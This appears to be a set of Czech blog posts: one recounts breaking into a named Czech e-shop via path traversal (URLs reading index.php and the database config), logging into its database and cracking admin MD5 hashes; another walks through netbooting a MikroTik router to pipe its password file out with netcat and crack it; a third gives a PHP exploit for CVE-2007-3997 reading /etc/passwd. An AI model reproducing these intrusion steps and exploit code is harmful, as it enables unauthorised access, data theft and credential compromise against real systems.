V tom lepším případě, by při nabourání obchodu „hackerem“, mohlo vyjít najevo, že si každý měsíc po výplatě objednáváte nějakou sprosťárničku v sexshopu. V horším případě útočník zjistí i heslo a bude si tak moct číst vaši soukromou poštu s přítelkyní/milenkou/manželkou neboť do emailu zadáváte stejné heslo jako do eshopu. Pokud chcete slyšet hororové scénáře, pak věřte, že není problém využít uložených informací o vaší kartě a objednat si tak jakékoliv zboží, které ve výsledku ovšem nezaplatí útočník, ale vy z vaší karty.

Stále si myslíte, že se vám to nemůže stát neboť nakupujete pouze v renomovaných a velkých eshopech? Chyba!

Před před více jak týdnem jsem zcela náhodou objevil na stránkách jednoho z největších českých prodejců outdoorového vybavení – firmy Rock point zcela zásadní (a naprosto školáckou) bezpečnostní chybu. Ihned jsem prodejce emailově kontaktoval a problém mu nastínil. Bohužel do dnešního dne jsem neobdržel odpověď a chyba je stále neopravená.

O co jde?

Při hledání dokumentace k jednomu z výrobků jsem narazil na následující odkaz:

http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls

Nebývá zrovna zvykem, že by prodejce uveřejňoval seznam svých odběratelů. To ve mě vyvolalo pocit, že tato stránka měla být před zraky zákazníků ukryta. Začal jsem přemýšlet, co by se stalo, kdybych zadal jako parametr jiný soubor než je seznam_odberatelu_NET.xls. Po chvíli jsem tedy do adresního řádku zadal následující adresu:

http://www.rockpoint.cz/download.php?soubor=soubory/../index.php

Při čemž „index.php“ bývá „startovací stránkou“ webu a řetězec „../“ značí, že se jedná o nadřazený adresář.
To co se stalo mi téměř vyrazilo dech. Zobrazila se mi totiž opravdu zdrojová stránka souboru index.php. Opravdu bych nečekal, že u tak velkého prodejce narazím na tak kritickou chybu.

Ze zvědavosti jsem stejným způsobem procházel všechny ostatní soubory na serveru, až jsem došel k následujícímu:

http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php

Tento soubor (jak je již patrné z názvu) obsahuje data potřebná pro připojení k My SQL databázi.
Tím ovšem má zvědavost neskončila. Rozhodl jsem se výsledek ověřit.

V konfiguračním souboru je uveden jako My SQL host „uvdb4.globe.cz“. Vzdálený přístup k této databázi sice není povolen, ale to mě nemohlo odradit. Po chvíli hledání jsem zjistil, že se jedná o server, který je provozován v rámci hostingu Active 24. Na stejnojmenných stránkách jsem pak v sekci podpora našel odkaz k PHPMyAdminovi, který umožňuje spravovat My SQL databáze pomocí web prohlížeče. Kliknul jsem na link a zadal přihlašovací údaje. Nemohlo následovat nic jiného, než úspěšné přihlášení. Přede mnou byl kompletní seznam všech výrobků, uživatelů, objednávek a seznamů prodejen. V podstatě bych v této chvíli mohl eshop plně ovládnout, ale mě zajímala poslední neprozkoumaná věc – administrativní sekce obchodu.

Administrační sekci nebylo zase tak těžké najít. Kupodivu se nacházela na url:

http://www.rockpoint.cz/admin/

Nahlédl jsem zpět do tabulky administrátorů, abych zjistil přihlašovací jméno a heslo. Zde byla alespoň nějaká snaha o zabezpečení – heslo bylo zakódováno pomocí algoritmu MD5. Bohužel tento algoritmus je už dnes „překonaný“. heslo prvního administrátora jsem tak „rozlouskl“ díky jeho jednoduchosti přes jednu z online HASH databází. Heslo druhého administrátora bylo sice složitější, ovšem pod útokem rainbow tabulek bylo později prolomeno také. Oba účty jsem ještě otestoval – byly funkční. Tím má „práce“ skončila.

Výše uvedený text nenabádá k zneužití popsané chyby. Text byl sepsán z důvodu laxního přístupu administrátorů danných stránek.

Tento příspěvek je chráněn heslem. Pokud ho chcete zobrazit, zadejte prosím heslo:

Heslo:

Tento příspěvek je chráněn heslem. Pokud ho chcete zobrazit, zadejte prosím heslo:

Heslo:

1. Zapojíme USB->COM redukci. U mě se redukce namapuje na ttyUSB0 – viz hláška z dmesg

[ 8446.216000] usb 1-1: pl2303 converter now attached to ttyUSB0

2. Nainstalujeme TFTP server
# sudo apt-get install atftpd

3. Opravíme konfiguraci démona xinet přidáním parametru „-inetd_compat“
# sudo vi /etc/default/xinetd
XINETD_OPTS="-stayalive -inetd_compat"

4. Nahrajeme alternativní kernel s podporou yaffs2 do adresáře /tftpboot

5. Nainstalujeme DHCP server
# sudo apt-get install dhcp3-server

6. Nastavíme parametry DHCP serveru
# sudo vi /etc/dhcp3/dhcpd.conf
default-lease-time 21600;
max-lease-time 43200;
option domain-name-servers 10.0.0.1;
option netbios-name-servers 10.0.0.1;
option netbios-node-type 8;
option www-server 10.0.0.1;
authoritative;
allow booting;
allow bootp;

subnet 10.0.0.0 netmask 255.255.255.0
{
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
filename "/tftpboot/linuxrc";
range 10.0.0.10 10.0.0.100;
}

7. Nastavíme IP adresu na našem síťovém rozhraní, spustíme DHCP a TFTP server
sudo ifconfig eth0 down
sudo ifconfig eth0 10.0.0.1 up
sudo /etc/init.d/xinetd restart
sudo /etc/init.d/dhcp3-server start

8. Spustíme konfiguraci minicomu
# minimcom -s

Vybereme položku „Nastavení sériového portu“ a nastavíme následující parametry:

A - Sériové zařízení : /dev/ttyUSB0
B - Umístění zámku : /var/lock
C - Program pro příchozí volání:
D - Program pro odchozí volání :
E - Bps/Par/Bity : 115200 8N1
F - Hardwarová kontrola toku : Ano
G - Softwarová kontrola toku : Ne

Připojíme kabel do Mikrotiku
Mělo by se zobrazit:
MikroTik 2.9.46
MikroTik Login:

Rebootujeme Mikrotik

Zobrazí se:
RouterBOOT booter 2.10
RouterBoard 532A
CPU frequency: 399 MHz
Memory size: 64 MB
Press any key within 2 seconds to enter setup.

Zmáčkneme libovolnou klávesu dříve, než vyprší interval.

Zobrazí se:
RouterBOOT-2.10
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vyberme „o“ pro volbu „boot device“.

Zobrazí se:
Select boot device:
e - boot over Ethernet
* n - boot from NAND, if fail then Ethernet
c - boot from CompactFlash only
1 - boot Ethernet once, then NAND
2 - boot Ethernet once, then CompactFlash
o - boot from NAND only
b - boot chosen device
your choice:

Vybereme „1″ pro boot z Ethernetu (a následně NAND)

Zobrazí se:
RouterBOOT-2.10
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vybereme „p“ pro „boot protocol“.

Zobrazí se:
Choose which boot protocol to use:
1 - bootp protocol
* 2 - dhcp protocol
your choice:

Vybereme „2″ pro „dhcp“ protocol“

Zobrazí se nám opět úvodní menu
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vybereme „x“ pro uložení a opuštění setupu. Mikrotik se znovu rebootuje.

Nyní by se měl načíst nový kernel – v mém případě z opravené distribuce OpenWrt
BusyBox v1.4.2 (2008-01-15 11:43:12 CET) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
KAMIKAZE (7.09) -----------------------------------
* 10 oz Vodka Shake well with ice and strain
* 10 oz Triple sec mixture into 10 shot glasses.
* 10 oz lime juice Salute!
---------------------------------------------------
root@OpenWrt:/#

Vypíšeme si jednotlivé blokové zařízení
#cat /proc/mtd
dev: size erasesize name
mtd0: 00400000 00004000 "RouterBoard NAND Boot"
mtd1: 03c00000 00004000 "RouterBoard NAND Main"

Připojíme filesystém na kterém jsou uložena hesla
# mount -t yaffs2 -o ro /dev/mtdblock1 /mnt

Na PC si spustíme netcat s následujícími parametry
sudo /bin/netcat -l -p 666 > user.dat

Na mikrotiku zobrazíme soubor s hesly a přes netcat ho pošleme do PC
cat /mnt/nova/store/user.dat|nc 10.0.0.1 666

Na PX spustíme nástroj na lámání hesel
# ./mtpass user.dat
mtpass v0.2 - MikroTik RouterOS password recovery tool
Reading file user.dat, 213 bytes long
Rec# | Username | Password | Disable flag | User comment
--------------------------------------------------------------------------------------------
1 | admin | mojeheslo | | system default user

Návod vychází z informací na stránkách http://manio.skyboo.net/mikrotik/
Autor neručí za případné škody při použití tohoto návodu.

Vztahuje se k:
< = PHP 5.2.3
<= PHP 4.4.7

CVE:
CVE-2007-3997

Problém:
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.

Detail:
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.

Řešení:
1) Kompilovat MySQL klienta s parametrem „–disable-local-infile“
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem „mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);“
2) Do konfiguračního souboru (/etc/mysql/my.cnf) vložit (do sekce [mysqld]) „set-variable=local-infile=0″.

Exploit:
function r($fp, &$buf, $len, &$err) {print fread($fp, $len);}
$m = new mysqli(‘localhost’, ‘aaaa’, “, ‘a’);
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler(„r“);
$m->query(„LOAD DATA LOCAL INFILE ‘/etc/passwd’ INTO TABLE a.a“);
$m->close();